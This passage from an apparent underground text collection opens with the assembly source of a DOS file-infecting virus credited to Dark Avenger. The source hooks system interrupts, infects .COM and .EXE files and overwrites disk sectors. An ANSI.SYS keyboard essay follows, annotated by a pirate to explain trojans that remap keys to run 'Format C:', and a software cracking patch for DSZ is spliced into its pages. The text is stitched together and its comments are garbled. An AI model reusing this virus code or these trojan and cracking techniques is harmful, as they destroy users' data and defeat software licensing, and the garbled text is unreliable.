cs:[si+disk+2],es mov ax,ds:[40h4+2] ;? INT 40h ?? ??????? ?????? ?? INT 13h cmp ax,0f000h ;?? ??????? ??? ??????? ?? ????? ???? jne nofdisk mov word ptr cs:[si+disk+2],ax mov ax,ds:[40h4] mov word ptr cs:[si+disk],ax mov dl,80h mov ax,ds:[41h4+2] ;INT 41h ?????????? ???? ? ????????, cmp ax,0f000h ;?????? ? ??????????? INT 13h ?????? je isfdisk cmp ah,0c8h jc nofdisk cmp ah,0f4h jnc nofdisk test al,7fh jnz nofdisk mov ds,ax cmp ds:[0],0aa55h jne nofdisk mov dl,ds:[2] isfdisk: mov ds,ax xor dh,dh mov cl,9 shl dx,cl mov cx,dx xor si,si findvect: lodsw ;?????????? ??????? ?: cmp ax,0fa80h ; CMP DL,80h jne altchk ; JNC ?????? lodsw cmp ax,7380h je intchk jne nxt0 altchk: cmp ax,0c2f6h ;??? ?: jne nxt ; TEST DL,80h lodsw ; JNZ ?????? cmp ax,7580h jne nxt0 intchk: inc si ;???? ????? ???: lodsw ; INT 40h cmp ax,40cdh je found sub si,3 nxt0: dec si dec si nxt: dec si loop findvect jmp short nofdisk found: sub si,7 mov word ptr cs:[di+fdisk],si mov word ptr cs:[di+fdisk+2],ds nofdisk: mov si,di pop ds ; ???????? ???? ?????????? ? ?????????? les ax,ds:[21h4] mov word ptr cs:[si+save_int_21],ax mov word ptr cs:[si+save_int_21+2],es push cs pop ds cmp ax,offset int_21 jne bad_func xor di,di mov cx,offset my_size scan_func: lodsb scasb jne bad_func loop scan_func pop es jmp go_program ; ??????????? ?? ?????????? ? ?????? ???? ?? ??????? ; (??? ? ????? ? ???????? ? ??????) bad_func: pop es mov ah,49h int 21h mov bx,0ffffh mov ah,48h int 21h sub bx,(top_bz+my_bz+1ch-1)/16+2 jc go_program mov cx,es stc adc cx,bx mov ah,4ah int 21h mov bx,(offset top_bz+offset my_bz+1ch-1)/16+1 stc sbb es:[2],bx push es mov es,cx mov ah,4ah int 21h mov ax,es dec ax mov ds,ax mov word ptr ds:[1],8 call mul_16 mov bx,ax mov cx,dx pop ds mov ax,ds call mul_16 add ax,ds:[6] adc dx,0 sub ax,bx sbb dx,cx jc mem_ok sub ds:[6],ax ;?????????? ?? ?????????? ?? ???????? mem_ok: pop si push si push ds push cs xor di,di mov ds,di lds ax,ds:[27h4] mov word ptr cs:[si+save_int_27],ax mov word ptr cs:[si+save_int_27+2],ds pop ds mov cx,offset aux_size rep movsb xor ax,ax mov ds,ax mov ds:[21h4],offset int_21;?????????? ?? INT 21h ? INT 27h mov ds:[21h4+2],es mov ds:[27h4],offset int_27 mov ds:[27h4+2],es mov word ptr es:[filehndl],ax pop es go_program: pop si ; ????????? ?? ????????? ?????? ?? ????? xor ax,ax mov ds,ax mov ax,ds:[13h4] mov word ptr cs:[si+save_int_13],ax mov ax,ds:[13h4+2] mov word ptr cs:[si+save_int_13+2],ax mov ds:[13h4],offset int_13 add ds:[13h4],si mov ds:[13h4+2],cs pop ds push ds push si mov bx,si lds ax,ds:[2ah] xor si,si mov dx,si scan_envir: ;?????? ????? ?? ?????????? lodsw ;(??? DOS 2.x ? ??? ????? ?? ??????) dec si test ax,ax jnz scan_envir add si,3 lodsb ; ?????????? ?????????? ? ????? ???????. ???????? ?? ?? ???????? path-? ? ; ????? ?????, ???? ???? ??????? ???????? ???????? ?? ???. ? ???????? ; ?? ???????? ??? + ?????? ? DOS ?????????? ?????? ?? ?? ???????, ?? ?? ; ???????? ??? ????? ? ???????, ???-???????? ????? ?????????? ????????. sub al,'A' mov cx,1 push cs pop ds add bx,offset int_27 push ax push bx push cx int 25h pop ax pop cx pop bx inc byte ptr [bx+0ah] and byte ptr [bx+0ah],0fh ;???????? 15 ???? ????????? ???? ? ????? jnz store_sec ;????? ?? ????? ???? mov al,[bx+10h] xor ah,ah mul word ptr [bx+16h] add ax,[bx+0eh] push ax mov ax,[bx+11h] mov dx,32 mul dx div word ptr [bx+0bh] pop dx add dx,ax mov ax,[bx+8] add ax,40h cmp ax,[bx+13h] jc store_new inc ax and ax,3fh add ax,dx cmp ax,[bx+13h] jnc small_disk store_new: mov [bx+8],ax store_sec: pop ax xor dx,dx push ax push bx push cx int 26h ; ??????? ???? ???? ?????????? ?? ? ???-?????? ????, ?????? ?? ???? ?? ???? ; ?????????? (????? ? ????? ?? ???????? ??????? ??????) pop ax pop cx pop bx pop ax cmp byte ptr [bx+0ah],0 jne not_now mov dx,[bx+8] pop bx push bx int 26h small_disk: pop ax not_now: pop si xor ax,ax mov ds,ax mov ax,word ptr cs:[si+save_int_13] mov ds:[13h4],ax mov ax,word ptr cs:[si+save_int_13+2] mov ds:[13h4+2],ax pop ds pop ax cmp word ptr cs:[si+my_save],5a4dh jne go_exit_com jmp exit_exe go_exit_com: jmp exit_com int_24: mov al,3 ;???? ?????????? ???????? ??????? iret ; ????????? ?? INT 27h (???? ? ??????????) int_27: pushf call alloc popf jmp dword ptr cs:[save_int_27] ; ??? DOS-????????? Set & Get Vector ?? ?????? ???? ?? ?? ?????????? ?? ?? ? ; ?????????? (???? ? ?????????? ?????????? ? ? ???? ???????? ???????? ?? ; ????????????? ? ????? "????????????" ????????) set_int_27: mov word ptr cs:[save_int_27],dx mov word ptr cs:[save_int_27+2],ds popf iret set_int_21: mov word ptr cs:[save_int_21],dx mov word ptr cs:[save_int_21+2],ds popf iret get_int_27: les bx,dword ptr cs:[save_int_27] popf iret get_int_21: les bx,dword ptr cs:[save_int_21] popf iret exec: call do_file call alloc popf jmp dword ptr cs:[save_int_21] db 'Diana P.',0 ; ????????? ?? INT 21h. ??????????? ???????????? ?? ????????? ; ??? ??????????, ????????, ??????????? ??? ????????? ? ????? ????? ????????. ; ???????????? ?? ??????? 0 ? 26h ??????????? ???? ?????????. int_21: push bp mov bp,sp push [bp+6] popf pop bp pushf call ontop cmp ax,2521h je set_int_21 cmp ax,2527h je set_int_27 cmp ax,3521h je get_int_21 cmp ax,3527h je get_int_27 cld cmp ax,4b00h je exec cmp ah,3ch je create cmp ah,3eh je close cmp ah,5bh jne not_create create: cmp word ptr cs:[filehndl],0;???? ? ?? ? 0 ??? ??????? ???? jne dont_touch call see_name jnz dont_touch call alloc popf call function jc int_exit pushf push es push cs pop es push si push di push cx push ax mov di,offset filehndl stosw mov si,dx mov cx,65 move_name: lodsb stosb test al,al jz all_ok loop move_name mov word ptr es:[filehndl],cx all_ok: pop ax pop cx pop di pop si pop es go_exit: popf jnc int_exit ;JMP close: cmp bx,word ptr cs:[filehndl] jne dont_touch test bx,bx jz dont_touch call alloc popf call function jc int_exit pushf push ds push cs pop ds push dx mov dx,offset filehndl+2 call do_file mov word ptr cs:[filehndl],0 pop dx pop ds jmp go_exit not_create: cmp ah,3dh je touch cmp ah,43h je touch cmp ah,56h ;?? ????????? ????????? ????????????? jne dont_touch ;?? ????????? ???? ??????? touch: call see_name jnz dont_touch call do_file dont_touch: call alloc popf call function int_exit: pushf push ds call get_chain mov byte ptr ds:[0],'Z' pop ds popf dummy proc far ;??? ret 2 dummy endp ; ????????? ???? ?????? ? .COM ??? .EXE. ?? ?? ??????? ??? ?????????? ?? ????. see_name: push ax push si mov si,dx scan_name: lodsb test al,al jz bad_name cmp al,'.' jnz scan_name call get_byte mov ah,al call get_byte cmp ax,'co' jz pos_com cmp ax,'ex' jnz good_name call get_byte cmp al,'e' jmp short good_name pos_com: call get_byte cmp al,'m' jmp short good_name bad_name: inc al good_name: pop si pop ax ret ; ??????????? ? lowercase (????????????? ?? ?????? ????). get_byte: lodsb cmp al,'C' jc byte_got cmp al,'Y' jnc byte_got add al,20h byte_got: ret ; ??????? ??????????? INT 21h (?? ?? ?? ?? ???????). function: pushf call dword ptr cs:[save_int_21] ret ; ?????? ??????? ?? ???????? ????. do_file: push ds ;??????? ?????????? ? ????? push es push si push di push ax push bx push cx push dx mov si,ds xor ax,ax mov ds,ax les ax,ds:[24h4] ;??????? INT 13h ? INT 24h ? ????? push es ;? ?? ??????? ? ????? ?????? push ax mov ds:[24h4],offset int_24 mov ds:[24h4+2],cs les ax,ds:[13h4] mov word ptr cs:[save_int_13],ax mov word ptr cs:[save_int_13+2],es mov ds:[13h4],offset int_13 mov ds:[13h4+2],cs push es push ax mov ds,si xor cx,cx ;?????? ??????? ?? Read-only ????????? mov ax,4300h call function mov bx,cx and cl,0feh cmp cl,bl je dont_change mov ax,4301h call function stc dont_change: pushf push ds push dx push bx mov ax,3d02h ;???? ???? ????? ?? ??????????? ?? call function ;??????? ????? jc cant_open mov bx,ax call disease mov ah,3eh ;????????? call function cant_open: pop cx pop dx pop ds popf jnc no_update mov ax,4301h ;?????????????? ?? ?????????? ?? ?????, call function ;??? ?? ???? ????????? (?? ????? ??????) no_update: xor ax,ax ;?????????????? ?? INT 13h ? INT 24h mov ds,ax pop ds:[13h4] pop ds:[13h4+2] pop ds:[24h4] pop ds:[24h4+2] pop dx ;?????????????? ?? ?????????? pop cx pop bx pop ax pop di pop si pop es pop ds ret ; ???? ??????????? ????? ??????? ??????. disease: push cs pop ds push cs pop es mov dx,offset top_save ;????????? ?? ???????? ?? ????? mov cx,18h mov ah,3fh int 21h xor cx,cx xor dx,dx mov ax,4202h ;????????? ?? ????????? ?? ????? int 21h mov word ptr [top_save+1ah],dx cmp ax,offset my_size ;?? ???????? ?? ???? top_file sbb dx,0 jc stop_fuck_2 ;????? ??????? ?? ?? ????????? mov word ptr [top_save+18h],ax cmp word ptr [top_save],5a4dh jne com_file mov ax,word ptr [top_save+8] add ax,word ptr [top_save+16h] call mul_16 add ax,word ptr [top_save+14h] adc dx,0 mov cx,dx mov dx,ax jmp short see_sick com_file: cmp byte ptr [top_save],0e9h jne see_fuck mov dx,word ptr [top_save+1] add dx,103h jc see_fuck dec dh xor cx,cx ; ????? ???????? ???? ?? ????? ? ??????? ????? ?????? see_sick: sub dx,startup-copyright sbb cx,0 mov ax,4200h int 21h add ax,offset top_file adc dx,0 cmp ax,word ptr [top_save+18h] jne see_fuck cmp dx,word ptr [top_save+1ah] jne see_fuck mov dx,offset top_save+1ch mov si,dx mov cx,offset my_size mov ah,3fh int 21h jc see_fuck cmp cx,ax jne see_fuck xor di,di next_byte: lodsb scasb jne see_fuck loop next_byte stop_fuck_2: ret see_fuck: xor cx,cx ;????????????? ? ???? ?? ????? xor dx,dx mov ax,4202h int 21h cmp word ptr [top_save],5a4dh je fuck_exe add ax,offset aux_size+200h ;?? ?? ????? .COM ????? ????? ????? adc dx,0 je fuck_it ret ; ????????? ?? ??????? ?? ???????? ?? .EXE ?????????. ???? ? ????????? ???????. fuck_exe: mov dx,word ptr [top_save+18h] neg dl and dx,0fh xor cx,cx mov ax,4201h int 21h mov word ptr [top_save+18h],ax mov word ptr [top_save+1ah],dx fuck_it: mov ax,5700h ;????????? ?? ?????? ?? ????? int 21h pushf push cx push dx cmp word ptr [top_save],5a4dh je exe_file ;????? ????, ???? ?? mov ax,100h jmp short set_adr exe_file: mov ax,word ptr [top_save+14h] mov dx,word ptr [top_save+16h] set_adr: mov di,offset call_adr stosw mov ax,dx stosw mov ax,word ptr [top_save+10h] stosw mov ax,word ptr [top_save+0eh] stosw mov si,offset top_save ;???? ???? ?????????? ?? ????? ?????? movsb ;???????? ?? ??????????? ????? movsw ;???????????? ??????? ?? .EXE ????? xor dx,dx mov cx,offset top_file mov ah,40h int 21h ;????????? ?? ?????????? jc go_no_fuck ;(?? ?????????? ???) xor cx,ax jnz go_no_fuck mov dx,cx mov ax,4200h int 21h cmp word ptr [top_save],5a4dh je do_exe mov byte ptr [top_save],0e9h mov ax,word ptr [top_save+18h] add ax,startup-copyright-3 mov word ptr [top_save+1],ax mov cx,3 jmp short write_header go_no_fuck: jmp short no_fuck ; ???????????? ?? header-? ?? .EXE ????? do_exe: call mul_hdr not ax not dx inc ax jne calc_offs inc dx calc_offs: add ax,word ptr [top_save+18h] adc dx,word ptr [top_save+1ah] mov cx,10h div cx mov word ptr [top_save+14h],startup-copyright mov word ptr [top_save+16h],ax add ax,(offset top_file-offset copyright-1)/16+1 mov word ptr [top_save+0eh],ax mov word ptr [top_save+10h],100h add word ptr [top_save+18h],offset top_file adc word ptr [top_save+1ah],0 mov ax,word ptr [top_save+18h] and ax,1ffh mov word ptr [top_save+2],ax pushf mov ax,word ptr [top_save+19h] shr byte ptr [top_save+1bh],1 rcr ax,1 popf jz update_len inc ax update_len: mov word ptr [top_save+4],ax mov cx,18h write_header: mov dx,offset top_save mov ah,40h int 21h ;????????? ?? ???????? ?? ????? no_fuck: pop dx pop cx popf jc stop_fuck mov ax,5701h ;?????????????? ?? ???????????? ???? int 21h stop_fuck: ret ; ????????? ?? ?? ????????????? ?? ????????? ?? INT 21h ? INT 27h ??? ?????? ; ??? ?????????? ?? ?????????? ? ??????? ?? ????, ????? ???? ????? ?? ? ; ??????. ?????? ???? ??????? ? ???????? ? ??????? ? ? ??? ???? ???????? ; ?? ?????????? ????????. alloc: push ds call get_chain mov byte ptr ds:[0],'M' pop ds ; ????????? ?????????? ?? ?????????? ?? ????? ?? ???????? ???????, ; ?????????? INT 21h (??? ??? ???? ???????? ?? ?????????). ontop: push ds push ax push bx push dx xor bx,bx mov ds,bx lds dx,ds:[21h4] cmp dx,offset int_21 jne search_segment mov ax,ds mov bx,cs cmp ax,bx je test_complete ; ????????? ???????? ?? ?????????? ????????? INT 21h, ?? ?? ?????? ???? ??? ; ? ??????? ??????? ???????? ? ?? ? ???????. ?? INT 27h ?? ?? ????? ????. xor bx,bx search_segment: mov ax,[bx] cmp ax,offset int_21 jne search_next mov ax,cs cmp ax,[bx+2] je got_him search_next: inc bx jne search_segment je return_control got_him: mov ax,word ptr cs:[save_int_21] mov [bx],ax mov ax,word ptr cs:[save_int_21+2] mov [bx+2],ax mov word ptr cs:[save_int_21],dx mov word ptr cs:[save_int_21+2],ds xor bx,bx ; ? ?? ?? ?? ???? ? ????? ???????, ???? ??? ???? ???? ?? ?? ??????? return_control: mov ds,bx mov ds:[21h4],offset int_21 mov ds:[21h4+2],cs test_complete: pop dx pop bx pop ax pop ds ret ; ???????? ?? ???????? ?? ????????? MCB get_chain: push ax push bx mov ah,62h call function mov ax,cs dec ax dec bx next_blk: mov ds,bx stc adc bx,ds:[3] cmp bx,ax jc next_blk pop bx pop ax ret ; ????????? ?? 16 mul_hdr: mov ax,word ptr [top_save+8] mul_16: mov dx,10h mul dx ret db 'This program was written in the city of Sofia ' db '(C) 1988-89 Dark Avenger',0 ; ????????? ?? INT 13h. ; ??????? ???????????? ??????? ? BIOS, ??? ????? ???? ?? ?????. int_13: cmp ah,3 jnz subfn_ok cmp dl,80h jnc hdisk db 0eah ;JMP XXXX:YYYY my_size: ;--- ????? ?? ???????? ? ????????? disk: dd 0 hdisk: db 0eah ;JMP XXXX:YYYY fdisk: dd 0 subfn_ok: db 0eah ;JMP XXXX:YYYY save_int_13: dd 0 call_adr: dd 100h stack_pointer: dd 0 ;?????????? ???????? ?? SS:SP my_save: int 20h ;?????????? ?????????? ?? ??????? nop ;3 ????? ?? ????? top_file: ;--- ????? ?? ??????? ??? ????????? filehndl equ $ filename equ filehndl+2 ;????? ?? ??? ?? ?????? ????????? ???? save_int_27 equ filename+65 ;?????????? ???????? ?? INT 27h save_int_21 equ save_int_27+4 ;?????????? ???????? ?? INT 21h aux_size equ save_int_21+4 ;--- ????? ?? ????????? ? ??????? top_save equ save_int_21+4 ;?????? ?? ??????, ????????: ; - ??????? 24 ????? ????????? ?? ????? ; - ????????? ?? ????? (4 ?????) ; - ?????????? ??????? ?? ????? ; (? ??????? my_size) top_bz equ top_save-copyright my_bz equ my_size-copyright code ends end ??????????????????????????????????????????????????????????????????????????????? Phile 7: USING THE ANSI DRIVER [TO MAKE TROJENS] by C. Scot Giles 875 Lake Street Oak Park, Illinois 60301 [Turned Pirate By Toilet Scum] [All text in [] has been added by Toilet Scum, leader of AAD (Alliance Against] [DUNE), WITHOUT the consent of the author!] This essay is an attempt to explain how I use the ANSI.SYS driver to configure the function keys on my computer, and to control the screen. I have used these techniques on my PC and AT for years, and find them to be convenient and effective. ANSI is not widely used by microcomputer fans because the documentation supplied by IBM on how to send control codes to the ANSI driver is among the most cryptic ever produced by IBM. I learned them by reading computer magazines, and slowly figured out how it could be done. I am not a professional computer programmer (indeed I am a clergyman), so some of my ^^^^^^^^^ [And i'm a Pirate] technical observations might be in error. But everything here works, and I have retested it before finishing this essay. This essay covers only IBM Personal Computers (PC, XT or AT) running DOS 2.n or greater. I have no experience with compatibles, so you are on your own if you try to use these techniques on one. LOADING THE ANSI DRIVER In order to use any of the techniques in this essay, you must first have loaded the ANSI.SYS driver into your computer's memory using your CONFIG.SYS file. You do this my adding the line, DEVICE=ANSI.SYS somewhere in the CONFIG.SYS file and rebooting your computer. [My intellegance was insulted here] KEYBOARD REASSIGNMENT WITH ANSI Before we get to specific ways to send control codes to the (now loaded) ANSI driver, you must first know what those codes mean. For the function keys the codes are listed on the chart below which first appeared in SOFTALK magazine. Each function key is assigned an "extended function code" which DOS will use to recognize that a function key has been pressed and in what shifted mode, if any. Each number is expressed as a 0 followed by a semi-colon, then the number from the chart below. KEY NORMAL SHIFT CONTROL ALT F1 59 84 94 104 F2 60 85 95 105 F3 61 86 96 106 F4 62 87 97 107 F5 63 88 98 108 F6 64 89 99 109 F7 65 90 100 110 F8 66 91 101 111 F9 67 92 102 112 F10 68 93 103 113 Accordingly, the way to designate the F5 key would be 0;63 while the F10 key would be designated by 0;68 or 0;113 if shifted with the ALT key. ??????????????????????????????????????????????????????????????????????????????? Using the ANSI driver, Page -2- If you examine the DOS Technical Reference Manual (not the Technical Manual for PC hardware), you will find a section on SCREEN/KEYS. This section was contained in the DOS 2.0 documentation, but IBM removed it in later editions. Here is a summary of its contents relative to keyboard redefinition. To change one key to have the meaning of another, enter: ESC [#;#p where the first # is the ASCII value of the key being changed and the second # is the ASCII value of the new definition. For example, "A" has the ASCII value of 65 and "Q" has the value of 81. So: ESC [65;81p will result in "A" being redefined as "Q." It is also possible to redefine a key to have the meaning of a string of characters. This is done by enclosing the string in quotes. So: ESC [65;"Hi there"p would change the "A" key to have the meaning of "Hi there." If the first value for the first # is a 0 however, DOS knows that what is being changed is not an ASCII value but the meaning of an extended function code. So if you were to enter: ESC [0;68;"Hi there"p DOS would know to change the meaning of the function key (in this case F10) to the sting enclosed in quotes. This is the key to redefining your function keys to perform much used commands: like DIR, CHKDSK, COPY . B: etc. or to load programs from disk. There is a final trick here. If you end the escape command sequence with the characters ";13p" instead of just "p" the command will self-execute, just as if you pressed the [enter] key. The IBM documentation tells the user to preface each command by an ESC command, and I have represented this in the above paragraphs by writing the characters "ESC." at the start of each control code sequence mentioned. Most users assume that this means to press the ESC key on the keyboard when entering the commands. Not so. To get the Escape Sequence to the ANSI driver you must enter it using a prompt command or write a .COM file. For example to configure the F1 key (extended function code 59) to have the meaning in DOS of "autoexec" with an [enter] command at the end of it you cannot type: ESC [0;59;"autoexec";13p ^^^^^^^^ [Put something useful] [here like "Format C:" Then] [redifine his N to Y, Get the] [picture?] as the ESC will not be recognized by DOS as an escape sequence. What DOS will recognize as an escape sequence is the characters "$e" although this surely looks strange at first. Users familiar with the PROMPT command will notice that the "$" character is what the PROMPT command uses as an escape sequence, and that is precisely how we will get the redefinition to be recognized by DOS. If you enter the following command: ???????????????????????????????????????????????????????????????????????????????? Using the ANSI driver, Page -3- PROMPT $e[0;59;"autoexec";13p you will see that it works perfectly. You now have the secret to redefining the function keys in DOS. Simply write and run a batch file with a list of PROMPT commands and you will have done it. One precaution, ECHO must be ON, otherwise DOS will suppress the PROMPT command and the escape sequences will not get through. As an example, let's create a batch file called KEYON.BAT that will set F1 as EDITOR [enter], F2 as PC-FILE [enter], F3 as PC-CALC [enter], F4 as PC-GRAPH [enter], F5 as PC-TALK [enter], F6 as PC-WRITE [enter], F7 as BASICA [enter], F8 as DIR without the [enter], F9 to run a batch file called MENUOFF.BAT [enter] and F10 to run a batch file called MENUON.BAT [enter]. It would be as follows: echo on PROMPT $e[0;59;"EDITOR";13p PROMPT $e[0;60;"PC-FILE";13p PROMPT $e[0;61;"PC-CALC";13p PROMPT $e[0;62;"PC-GRAPH";13p PROMPT $e[0;63;"PC-TALK";13p PROMPT $e[0;64;"PC-WRITE";13p PROMPT $e[0;65;"BASICA";13p PROMPT $e[0;66;"DIR"p PROMPT $e[0;67;"MENUOFF";13p PROMPT $e[0;68;"MENUON";13p prompt cls You would also want to create another file called KEYOFF.BAT which resets the function key definitions to DOS normal. The format would be: echo on PROMPT $e[0;59;0;59p PROMPT $e[0;60;0;60p PROMPT $e[0;61;0;61p PROMPT $e[0;62;0;62p PROMPT $e[0;63;0;63p PROMPT $e[0;64;0;64p PROMPT $e[0;65;0;65p PROMPT $e[0;66;0;66p PROMPT $e[0;67;0;67p PROMPT $e[0;68;0;68p prompt cls I should mention that the purpose of the final blank PROMPT command in each of these batch files is to reset the DOS prompt to A> or whatever your default prompt is. It serves no redefinition purpose, but does keep the screen looking clean. [I have not found any good uses for this Prompt stuff, but if you find any] [let me know] ??????????????????????????????????????????????????????????????????????????????? Using the ANSI driver, Page -4- USING DEBUG TO LOAD THE ANSI DRIVER [Using this method you can Write COM files that that contain ANSI trojens,] [VERY Useful] While there is no reason why we could not continue to configure our function keys by batch files consisting of lists of PROMPT commands, this is a clumsy way to proceed. It is easier to use the DEBUG utility supplied with DOS to create a .COM file that will do the job for us quickly and directly, without sending any input to screen. To my knowledge this technique was first published by Michael J. Grabel in the December 1984 edition of PC WORLD. Place a formatted DOS disk containing the DEBUG utility in the default drive, and follow the script below. As you do so hexadecimal numbers will appear on the left hand side of your screen. These numbers will vary depending on the configuration of your system. For our purposes here I will represent the numbers in the form xxxx:nnnn. What you will see on your screen will be different. A>DEBUG [enter] -A 100 [enter] MOV AH,9 [enter] MOV DX,109 [enter] INT 21 [enter] INT 20 [enter] xxxx:nnnn DB 1B'[0;59;"EDITOR";13p' [enter] xxxx:nnnn DB 1B'[0;60;"PC-FILE";13p' [enter] xxxx:nnnn DB 1B'[0;61;"PC-CALC";13p' [enter] xxxx:nnnn DB 1B'[0;62;"PC-GRAPH";13p' [enter] xxxx:nnnn DB 1B'[0;63;"PC-TALK";13p' [enter] xxxx:nnnn DB 1B'[0;64;"PC-WRITE";13p' [enter] xxxx:nnnn DB 1B'[0;65;"BASICA";13p' [enter] xxxx:nnnn DB 1B'[0;66;"DIR"p' [enter] xxxx:nnnn DB 1B'[0;67;"MENUOFF";13p' [enter] xxxx:nnnn DB 1B'[0;68;"MENUON";13p' [enter] xxxx:nnnn DB 1B '$' [enter] As soon as you have entered the previous line, your computer will respond with a number in the form of xxxx:nnnn. Copy down the portion of the number that is being represented here as "nnnn" as you will need it later. Once you have copied the number down, press [enter] xxxx:nnnn [enter] -N KEYON.COM [enter] -R BX [enter] When you have entered the command above, your computer will respond with the following line and a colon as a prompt. At this prompt enter 0 and press [enter]. BX:0000 :0 [enter] -R CX [enter] When you enter the R CX command above, the computer will respond with the following line and a colon as a prompt. At this prompt enter the number, "nnnn" you copied down above and press [enter]. ??????????????????????????????????????????????????????????????????????????????? Using the ANSI driver, Page -5- CX 0000 :nnnn [enter] -W [enter] The computer will respond with the following. WRITING nnnn bytes -Q [enter] As soon as you enter the Q command (for Quit) you will be back at the DOS prompt, and there will be a new file on disk called KEYON.COM. Simply type it at the DOS prompt and your function keys will be configured. It is a good idea to use this same procedure to write another .COM file called KEYOFF.COM which will restore the keys to their native DOS definitions. The procedure for this is the same as the above, except that the definition section should be: xxxx:nnnn DB 1B'[0;59;0;59p' [enter] xxxx:nnnn DB 1B'[0;60;0;60p' [enter] xxxx:nnnn DB 1B'[0;61;0;61p' [enter] xxxx:nnnn DB 1B'[0;62;0;62p' [enter] xxxx:nnnn DB 1B'[0;63;0;63p' [enter] xxxx:nnnn DB 1B'[0;64;0;64p' [enter] xxxx:nnnn DB 1B'[0;65;0;65p' [enter] xxxx:nnnn DB 1B'[0;66;0;66p' [enter] xxxx:nnnn DB 1B'[0;67;0;67p' [enter] xxxx:nnnn DB 1B'[0;68;0;68p' [enter] xxxx:nnnn DB 1B '$' [enter] If you find that KEYON.COM doesn't work correctly, reboot the machine to clear the definitions and try again. The most common mistakes are typing errors (I often enter a colon when I wanted a semi-colon). Another source of difficulty will arise if you have another file on disk to start with called KEYON.COM or KEYOFF.COM. DEBUG bypasses the normal file allocation of DOS and writes directly to the disk. If you have another file on disk with the same name, DEBUG will overwrite it, but unless the other file was exactly the same size as the new one or smaller, there may be a piece of the old file left over attached to the end of the new one. As a precaution, always erase old versions of the .COM files, or better yet give each one a unique name and rename it later using the DOS Rename command. SOME ADDITIONAL TRICKS [How to make your Trojens PRETTY??] Here are some additional control codes for the ANSI driver, summarized from the IBM material. 1. CURSOR POSITIONING To move the cursor to a specified position: ESC [#;#h where the first # is the desired line number and the second the desire column. To move the cursor up without changing columns: ESC [#a where # specifies the number of lines moved. ??????????????????????????????????????????????????????????????????????????????? DSZ UNPROTECT FOR .EXE OR .COM VERSIONS The following DEBUG listing should aid most people familiar with any type of byte editor in removing the opening and closing screens and also enable the enhanced features of DSZ.COM or DSZ.EXE . * IT WILL WORK WITH >ANY< VERSION, EXE OR COM THAT I HAVE TRIED.* DSZ is an excellent multiple protocol program which can be added to many terminal programs with very little effort and with excellent results. ZMODEM is the ultimate choice of this programmer for many reasons. Here are just a few of the Best Features. 1.Crash recovery is great for those lousy phone lines that have a tendency to lose connection 5 minutes into a 6 minute download. Just call back and it will pickup right where it left off which means saving BIG $$$$$ compared to starting all over which makes Ma Bell BIG $$. 2.Automated filename transfer which saves having to double type in filenames. Just tell the BBS to send using Zmodem protocol then call up DSZ and it will do the rest. 3.Greatly increases efficiency in transfer rates and the reliability of what is sent is what you receive. It uses 32-bit CRC error checking and is not unusual to get as much as 239 CPS from a 2400 baud modem. The following are debug hex dumps of .COM and .EXE versions which as you will notice are very similar in the areas listed below. Directly following the copyright notice you will find 6 00's as soon as you locate these (which was the same address for every .COM version I checked and respectivly for every .EXE verison) all you need to do is change 4 of the 6 (the first 2 and last 2) as follows. --------< 64 1A{00 00 00 00 00 00}FF FF \| ^\|\| \|\| \|\| \|\| \|\| \|\|^ \| 91 14 00 00 CF 16 \| \| \| \| \| DSZ.COM \| \| ????:0180 90 90 90 90 C3 43 6F 70-79 72 69 67 68 74 20 31 .....Copyright 1 \| ????:0190 39 38 34 2C 20 31 39 38-38 20 4F 6D 65 6E 20 54 984, 1988 Omen T \| ????:01A0 65 63 68 6E 6F 6C 6F 67-79 20 49 6E 63 20 41 6C echnology Inc Al \| ????:01B0 6C 20 52 69 67 68 74 73-20 52 65 73 65 72 76 65 l Rights Reserve >>????:01C0 64 1A{00 00 00 00 00 00}FF FF 1E 06 55 56 57 F6 d...........UVW. \| ????:01D0 06 D9^A2 FF 74 1C B8 00^10 CD 16 A3 DC A2 3D 00 ....t.........=. \| ????:01E0 10 74 0F 3C E0 75 12 88-26 DB A2 8A C4 B4 02 EB .t.<.u..&....... \| \| \| DSZ.EXE \| \| ????:0110 90 90 90 90 90 90 C3 43-6F 70 79 72 69 67 68 74 .......Copyright \| ????:0120 20 31 39 38 34 2C 20 31-39 38 38 20 4F 6D 65 6E 1984, 1988 Omen \| ????:0130 20 54 65 63 68 6E 6F 6C-6F 67 79 20 49 6E 63 20 Technology Inc \| ????:0140 41 6C 6C 20 52 69 67 68-74 73 20 52 65 73 65 72 All Rights Reser >>????:0150 76 65 64 1A{00 00 00 00-00 00}FF FF 1E 06 55 56 ved...........UV ????:0160 57 F6 06 69^00 FF 74 1C-B8 00^10 CD 16 A3 6C 00 W..i..t.......l. ????:0170 3D 00 10 74 0F 3C E0 75-12 88 26 6B 00 8A C4 B4 =..t.<.u..&k.... If this has been a help to you GREAT!!!! if not find a friend that understands this type of hacking and ask for help. Furthermore I do not request anything (i.e. Money, Your first born or otherwise). If you have a guilty conscience about getting something for nothing THEN send a contribution to the AMERICAN CANCER SOCIETY. I'm certain that they can put it to better use than I would. Using the ANSI driver, Page -6- To move the cursor to a specified horizontal and vertical position: ESC [#;#f where # means first the line number and secondly the column number. To get a device status report: ESC [6n To get a cursor position report: ESC [#;#r where the first # specifies the current line and the second # specifies the current column To move the cursor down: ESC [#b where # specifies the number of lines moved down. To move the cursor forward: ESC [#C where # specifies the number of columns moved. To move the cursor backward: ESC [#d where # specifies the number of columns moved. To save the cursor position: ESC [s and to restore it: ESC [u. 2. ERASING To do a CLS (erase screen move cursor to home position): ESC [2j To erase from cursor to end of line: ESC [k 3. COLOR GRAPHICS To set the color/graphics attributes, enter ESC [#;#m where the first # is the desired foreground color and the second is the desired background color. Select colors from the list below: 30 black foreground 31 red foreground 32 green foreground 33 yellow foreground 34 blue foreground 35 magenta foreground 36 cyan foreground 37 white foreground 40 black background 41 red background 42 green background 43 yellow background 44 blue background 45 magenta background 46 cyan background 47 white background To set additional attributes enter: ESC [#m where # is the number of the desired attribute. Select attributes from the list below: 0 all attributes off (white on black) ??????????????????????????????????????????????????????????????????????????????? Using the ANSI driver, Page -7- 1 bold on 4 underscore (on IBM Monochrome Display) 5 blink 7 reverse video 8 invisible To give an example of what can be done with these additional codes, a batch file called MENUOFF.BAT containing only the line: PROMPT $e[2J$e[30;40m$h would blank a color display completely. It does a CLS, sets the display to a black foreground and background and the with the "$h" performs a backspace to erase the blinking cursor (the "$h command is documented in the DOS manual under PROMPT). Another batch file called MENUON.BAT containing the lines: PROMPT $e[0m prompt cls Would reset a color display to restore the screen after MENUOFF.BAT had been run. Enjoy ANSI! It is a wonderful tool, and can be a lot of fun to use. It's not 